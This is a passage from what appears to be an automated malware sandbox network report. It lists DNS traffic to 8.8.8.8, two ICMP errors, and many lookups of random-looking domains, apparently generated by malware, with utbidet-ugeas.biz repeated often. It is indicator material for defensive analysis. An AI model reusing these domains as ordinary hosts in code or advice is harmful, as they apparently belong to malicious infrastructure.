Dec 8, 2022 20:23:52.272532940 CET	53	52986	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:52.534522057 CET	63855	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:52.647085905 CET	53	63855	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:52.658142090 CET	49381	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:52.676665068 CET	53	49381	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:52.939717054 CET	58670	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:53.266002893 CET	53	58670	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:53.274454117 CET	50157	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:53.603075981 CET	53	50157	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:53.932790041 CET	49792	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:53.954695940 CET	53	49792	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:54.343518019 CET	55855	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:54.362138987 CET	53	55855	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:54.840564013 CET	52840	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:55.140357971 CET	53	52840	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:55.168575048 CET	56418	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:55.277750015 CET	53	56418	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:55.554075956 CET	60384	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:55.586730957 CET	53	60384	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:55.661281109 CET	59141	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:55.695458889 CET	53	59141	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:55.973915100 CET	64334	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:56.082597017 CET	53	64334	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:56.150597095 CET	61339	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:56.170016050 CET	53	61339	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:56.462142944 CET	56760	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:56.575448990 CET	53	56760	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:56.585864067 CET	62442	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:56.879568100 CET	53	62442	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:57.215100050 CET	60121	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:57.260199070 CET	53	60121	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:57.320890903 CET	60598	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:57.366300106 CET	53	60598	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:58.365293980 CET	63936	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:58.552095890 CET	53	63936	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:58.590827942 CET	62047	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:58.639503956 CET	53	62047	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:59.314714909 CET	56388	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:59.621299982 CET	53	56388	8.8.8.8	192.168.2.4
Dec 8, 2022 20:23:59.629080057 CET	63489	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:23:59.675030947 CET	53	63489	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:00.068711042 CET	56966	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:00.088666916 CET	53	56966	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:00.100835085 CET	50426	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:00.133816957 CET	53	50426	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:00.419121027 CET	52860	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:00.529131889 CET	53	52860	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:00.640671968 CET	57126	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:00.746587992 CET	53	57126	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:01.204525948 CET	50037	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:01.226432085 CET	53	50037	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:01.234435081 CET	58894	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:01.255567074 CET	53	58894	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:01.583573103 CET	62234	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:01.632036924 CET	53	62234	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:01.643162012 CET	57680	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:01.690710068 CET	53	57680	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:02.216643095 CET	64624	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:02.237093925 CET	53	64624	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:02.766757011 CET	63550	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:02.786300898 CET	53	63550	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:07.392894030 CET	59118	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:07.502298117 CET	53	59118	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:07.513411045 CET	60758	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:07.533262014 CET	53	60758	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:07.694883108 CET	60238	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:07.713757038 CET	53	60238	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:07.830710888 CET	63712	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:07.862937927 CET	53	63712	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:08.175497055 CET	53790	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:08.504266977 CET	53	53790	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:08.518284082 CET	53828	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:08.844906092 CET	53	53828	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:09.130022049 CET	65051	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:09.178441048 CET	53	65051	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:09.232989073 CET	51544	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:09.252351046 CET	53	51544	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:09.379422903 CET	63125	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:09.486393929 CET	53	63125	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:09.497951984 CET	52955	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:09.602777958 CET	53	52955	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:09.767004967 CET	55100	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:09.787125111 CET	53	55100	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:09.797178984 CET	51232	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:09.830981970 CET	53	51232	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:10.007364035 CET	56419	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:10.041429043 CET	53	56419	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:10.052675962 CET	63242	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:10.086266041 CET	53	63242	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:10.468362093 CET	56243	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:10.488830090 CET	53	56243	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:10.575306892 CET	53320	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:10.592319965 CET	53	53320	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:10.904802084 CET	64847	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:11.012785912 CET	53	64847	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:11.022917986 CET	62574	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:11.128829956 CET	53	62574	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:11.303931952 CET	52937	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:11.414315939 CET	53	52937	8.8.8.8	192.168.2.4
Dec 8, 2022 20:24:11.424994946 CET	63121	53	192.168.2.4	8.8.8.8
Dec 8, 2022 20:24:11.536031961 CET	53	63121	8.8.8.8	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Dec 8, 2022 20:22:56.721909046 CET	192.168.2.4	8.8.8.8	d029	(Port unreachable)	Destination Unreachable
Dec 8, 2022 20:23:09.941307068 CET	192.168.2.4	8.8.8.8	cfff	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 8, 2022 20:22:39.872745037 CET	192.168.2.4	8.8.8.8	0xb1d1	Standard query (0)	curipbeqyczvl.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:40.071707010 CET	192.168.2.4	8.8.8.8	0xd64f	Standard query (0)	curipbeqyczvl.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:40.320388079 CET	192.168.2.4	8.8.8.8	0x690e	Standard query (0)	gqwrm.vg	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:40.453785896 CET	192.168.2.4	8.8.8.8	0xcb08	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:40.582278967 CET	192.168.2.4	8.8.8.8	0x63e9	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:52.901825905 CET	192.168.2.4	8.8.8.8	0x4606	Standard query (0)	mcydsewd.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:53.019768000 CET	192.168.2.4	8.8.8.8	0x6df9	Standard query (0)	mcydsewd.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:53.354224920 CET	192.168.2.4	8.8.8.8	0x3b4c	Standard query (0)	sgwkqaq.museum	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:53.387741089 CET	192.168.2.4	8.8.8.8	0x68d3	Standard query (0)	sgwkqaq.museum	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:53.620306015 CET	192.168.2.4	8.8.8.8	0x1e5f	Standard query (0)	owagspnakos.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:53.660624027 CET	192.168.2.4	8.8.8.8	0x713	Standard query (0)	owagspnakos.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:53.893413067 CET	192.168.2.4	8.8.8.8	0x8089	Standard query (0)	qvesoxmeyeyo.museum	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:53.997725964 CET	192.168.2.4	8.8.8.8	0x49e1	Standard query (0)	qvesoxmeyeyo.museum	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:54.221564054 CET	192.168.2.4	8.8.8.8	0x3562	Standard query (0)	uvmmavmiuow.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:54.295140028 CET	192.168.2.4	8.8.8.8	0x298b	Standard query (0)	uvmmavmiuow.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:54.491018057 CET	192.168.2.4	8.8.8.8	0x8c2e	Standard query (0)	wlzqvavpfi.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:54.613585949 CET	192.168.2.4	8.8.8.8	0x1ef2	Standard query (0)	wlzqvavpfi.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:55.618751049 CET	192.168.2.4	8.8.8.8	0x1ef2	Standard query (0)	wlzqvavpfi.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:55.965656042 CET	192.168.2.4	8.8.8.8	0xc4d1	Standard query (0)	ymjmccm.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:56.082684994 CET	192.168.2.4	8.8.8.8	0x8bd4	Standard query (0)	ymjmccm.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:56.393907070 CET	192.168.2.4	8.8.8.8	0xd37	Standard query (0)	eaytemokm.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:56.440040112 CET	192.168.2.4	8.8.8.8	0xb61d	Standard query (0)	eaytemokm.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:56.735022068 CET	192.168.2.4	8.8.8.8	0xf890	Standard query (0)	kuyekiyyn.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:56.856137037 CET	192.168.2.4	8.8.8.8	0xd178	Standard query (0)	kuyekiyyn.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:57.199888945 CET	192.168.2.4	8.8.8.8	0x33a7	Standard query (0)	zrgoiae.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:57.357059956 CET	192.168.2.4	8.8.8.8	0x41ee	Standard query (0)	zrgoiae.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:57.617083073 CET	192.168.2.4	8.8.8.8	0x5a78	Standard query (0)	wksmneieulciyq.vg	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:57.826514959 CET	192.168.2.4	8.8.8.8	0xc0dd	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:58.234963894 CET	192.168.2.4	8.8.8.8	0x145c	Standard query (0)	sesqboeqkyqyg.ws	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:58.567951918 CET	192.168.2.4	8.8.8.8	0x4c	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:58.953711033 CET	192.168.2.4	8.8.8.8	0x444a	Standard query (0)	ywbwv.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:59.014270067 CET	192.168.2.4	8.8.8.8	0xe85a	Standard query (0)	ywbwv.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:59.295902967 CET	192.168.2.4	8.8.8.8	0x806d	Standard query (0)	gececkkbsocii.vg	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:59.459278107 CET	192.168.2.4	8.8.8.8	0x7e44	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:59.869236946 CET	192.168.2.4	8.8.8.8	0xdf10	Standard query (0)	eoidzfagia.ws	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:00.210371971 CET	192.168.2.4	8.8.8.8	0x61fb	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:00.631705046 CET	192.168.2.4	8.8.8.8	0x52e2	Standard query (0)	wgcoeoyemo.ws	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:00.934698105 CET	192.168.2.4	8.8.8.8	0x5062	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:01.398653984 CET	192.168.2.4	8.8.8.8	0xba0d	Standard query (0)	ubkukyoqxnyx.tk	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:02.044069052 CET	192.168.2.4	8.8.8.8	0xf52f	Standard query (0)	ubkukyoqxnyx.tk	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:02.839577913 CET	192.168.2.4	8.8.8.8	0x8261	Standard query (0)	skffvor.vg	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:04.940170050 CET	192.168.2.4	8.8.8.8	0x67b0	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:06.391251087 CET	192.168.2.4	8.8.8.8	0x75c	Standard query (0)	uyriu.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:06.446767092 CET	192.168.2.4	8.8.8.8	0x74ca	Standard query (0)	uyriu.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:06.821767092 CET	192.168.2.4	8.8.8.8	0x34ca	Standard query (0)	oeifsye.vg	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:06.886024952 CET	192.168.2.4	8.8.8.8	0xaa0a	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:07.306637049 CET	192.168.2.4	8.8.8.8	0x27ee	Standard query (0)	sxqom.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:07.424246073 CET	192.168.2.4	8.8.8.8	0xba96	Standard query (0)	sxqom.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:07.732155085 CET	192.168.2.4	8.8.8.8	0x9f45	Standard query (0)	tigrmsgpa.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:07.761733055 CET	192.168.2.4	8.8.8.8	0xc304	Standard query (0)	tigrmsgpa.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:08.023134947 CET	192.168.2.4	8.8.8.8	0x8106	Standard query (0)	kjyueawyersmum.museum	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:08.083558083 CET	192.168.2.4	8.8.8.8	0x63d5	Standard query (0)	kjyueawyersmum.museum	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:08.441706896 CET	192.168.2.4	8.8.8.8	0x118	Standard query (0)	stqluc.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:08.561708927 CET	192.168.2.4	8.8.8.8	0x5d7d	Standard query (0)	stqluc.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:08.894964933 CET	192.168.2.4	8.8.8.8	0x7abe	Standard query (0)	hcfigcsf.ws	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:09.917418003 CET	192.168.2.4	8.8.8.8	0x7abe	Standard query (0)	hcfigcsf.ws	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:10.157927990 CET	192.168.2.4	8.8.8.8	0x2060	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:10.544549942 CET	192.168.2.4	8.8.8.8	0x783e	Standard query (0)	wghscmmbcokww.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:10.664462090 CET	192.168.2.4	8.8.8.8	0x1cd	Standard query (0)	wghscmmbcokww.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:11.056972980 CET	192.168.2.4	8.8.8.8	0xe4ae	Standard query (0)	oktdaeqs.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:11.181210995 CET	192.168.2.4	8.8.8.8	0xdcfa	Standard query (0)	oktdaeqs.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:11.707911968 CET	192.168.2.4	8.8.8.8	0xb0f3	Standard query (0)	kuegscoauwnco.museum	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:12.046785116 CET	192.168.2.4	8.8.8.8	0x55f6	Standard query (0)	kuegscoauwnco.museum	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:12.380925894 CET	192.168.2.4	8.8.8.8	0x1b80	Standard query (0)	ovoykqlc.vg	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:12.588553905 CET	192.168.2.4	8.8.8.8	0xae35	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:13.026082993 CET	192.168.2.4	8.8.8.8	0xda88	Standard query (0)	qivzpbqveslmvh.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:13.088758945 CET	192.168.2.4	8.8.8.8	0x795c	Standard query (0)	qivzpbqveslmvh.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:13.348057032 CET	192.168.2.4	8.8.8.8	0xab0	Standard query (0)	efmgwmd.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:13.445178032 CET	192.168.2.4	8.8.8.8	0x818b	Standard query (0)	efmgwmd.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:13.729763031 CET	192.168.2.4	8.8.8.8	0x51e3	Standard query (0)	suerncbuckd.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:13.762952089 CET	192.168.2.4	8.8.8.8	0x261e	Standard query (0)	suerncbuckd.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:14.028650045 CET	192.168.2.4	8.8.8.8	0xe481	Standard query (0)	xwqkugqjrwceo.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:14.148555994 CET	192.168.2.4	8.8.8.8	0xb61e	Standard query (0)	xwqkugqjrwceo.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:14.463505983 CET	192.168.2.4	8.8.8.8	0xc36a	Standard query (0)	eeakfwo.museum	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:14.602087975 CET	192.168.2.4	8.8.8.8	0xa2cd	Standard query (0)	eeakfwo.museum	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:14.943679094 CET	192.168.2.4	8.8.8.8	0xfe3f	Standard query (0)	qjqhgkwbwqcoi.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:15.064776897 CET	192.168.2.4	8.8.8.8	0x86e0	Standard query (0)	qjqhgkwbwqcoi.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:15.474589109 CET	192.168.2.4	8.8.8.8	0x10c9	Standard query (0)	opyceqenbqqs.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:15.591288090 CET	192.168.2.4	8.8.8.8	0x74ce	Standard query (0)	opyceqenbqqs.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:16.011938095 CET	192.168.2.4	8.8.8.8	0xa5f8	Standard query (0)	sgscmskqmsvi.vg	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:16.141006947 CET	192.168.2.4	8.8.8.8	0x180d	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:16.569336891 CET	192.168.2.4	8.8.8.8	0x68c4	Standard query (0)	kocuxowua.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:16.687683105 CET	192.168.2.4	8.8.8.8	0x2b3c	Standard query (0)	kocuxowua.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:17.055624962 CET	192.168.2.4	8.8.8.8	0xd26b	Standard query (0)	emqhj.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:17.176655054 CET	192.168.2.4	8.8.8.8	0xde1b	Standard query (0)	emqhj.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:17.595197916 CET	192.168.2.4	8.8.8.8	0x1772	Standard query (0)	qvmyyuapkk.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:17.656239033 CET	192.168.2.4	8.8.8.8	0xdae4	Standard query (0)	qvmyyuapkk.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:18.161370993 CET	192.168.2.4	8.8.8.8	0x52e2	Standard query (0)	jymauen.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:18.280271053 CET	192.168.2.4	8.8.8.8	0x57d	Standard query (0)	jymauen.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:18.855078936 CET	192.168.2.4	8.8.8.8	0x8714	Standard query (0)	ujkceco.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:18.928729057 CET	192.168.2.4	8.8.8.8	0x55f6	Standard query (0)	ujkceco.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:19.226703882 CET	192.168.2.4	8.8.8.8	0x5487	Standard query (0)	uzugjmmhnwize.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:19.284846067 CET	192.168.2.4	8.8.8.8	0x96b7	Standard query (0)	uzugjmmhnwize.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:19.610243082 CET	192.168.2.4	8.8.8.8	0xc521	Standard query (0)	gkcobelirqy.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:19.665900946 CET	192.168.2.4	8.8.8.8	0xc6f7	Standard query (0)	gkcobelirqy.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:19.985394001 CET	192.168.2.4	8.8.8.8	0x5ab	Standard query (0)	sugwqxczc.vg	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:20.084899902 CET	192.168.2.4	8.8.8.8	0x49f9	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:20.452794075 CET	192.168.2.4	8.8.8.8	0x190	Standard query (0)	zlrequk.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:20.509488106 CET	192.168.2.4	8.8.8.8	0xbb7c	Standard query (0)	zlrequk.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:20.797401905 CET	192.168.2.4	8.8.8.8	0x296e	Standard query (0)	wuibcee.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:20.916975975 CET	192.168.2.4	8.8.8.8	0x36ce	Standard query (0)	wuibcee.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:21.180318117 CET	192.168.2.4	8.8.8.8	0x52bd	Standard query (0)	wamejcdvbdiw.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:21.301611900 CET	192.168.2.4	8.8.8.8	0x6ebf	Standard query (0)	wamejcdvbdiw.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:22.336812973 CET	192.168.2.4	8.8.8.8	0x5e9e	Standard query (0)	iydgligpetb.ws	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:25.348633051 CET	192.168.2.4	8.8.8.8	0x551d	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:26.432899952 CET	192.168.2.4	8.8.8.8	0xcaca	Standard query (0)	idusseszvtags.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:26.598642111 CET	192.168.2.4	8.8.8.8	0x4969	Standard query (0)	idusseszvtags.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:26.838835955 CET	192.168.2.4	8.8.8.8	0x9070	Standard query (0)	wcqio.vg	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:26.979777098 CET	192.168.2.4	8.8.8.8	0x9522	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:27.441659927 CET	192.168.2.4	8.8.8.8	0x6792	Standard query (0)	yncfsmisaj.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:27.553149939 CET	192.168.2.4	8.8.8.8	0x3901	Standard query (0)	yncfsmisaj.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:27.799190998 CET	192.168.2.4	8.8.8.8	0x22e1	Standard query (0)	kmuusce.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:27.916402102 CET	192.168.2.4	8.8.8.8	0x2756	Standard query (0)	kmuusce.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:28.332077026 CET	192.168.2.4	8.8.8.8	0xc222	Standard query (0)	zwaxagmgxusaq.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:28.447135925 CET	192.168.2.4	8.8.8.8	0x993a	Standard query (0)	zwaxagmgxusaq.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:28.696203947 CET	192.168.2.4	8.8.8.8	0x4cd0	Standard query (0)	agfzxqquo.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:29.012974024 CET	192.168.2.4	8.8.8.8	0x64b0	Standard query (0)	agfzxqquo.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:29.279817104 CET	192.168.2.4	8.8.8.8	0xc7c0	Standard query (0)	tdkakey.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:29.334384918 CET	192.168.2.4	8.8.8.8	0x912b	Standard query (0)	tdkakey.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:29.630079031 CET	192.168.2.4	8.8.8.8	0xf701	Standard query (0)	nzuws.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:29.795008898 CET	192.168.2.4	8.8.8.8	0x2f4	Standard query (0)	nzuws.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:30.267249107 CET	192.168.2.4	8.8.8.8	0x897f	Standard query (0)	mwuuqawsyoa.tk	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:30.604070902 CET	192.168.2.4	8.8.8.8	0x6548	Standard query (0)	mwuuqawsyoa.tk	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:31.109384060 CET	192.168.2.4	8.8.8.8	0x3cbd	Standard query (0)	izwarlczd.museum	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:31.239372015 CET	192.168.2.4	8.8.8.8	0x26f9	Standard query (0)	izwarlczd.museum	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:31.424737930 CET	192.168.2.4	8.8.8.8	0xb947	Standard query (0)	ctiowweyexi.ws	A (IP address)	IN (0x0001)	false
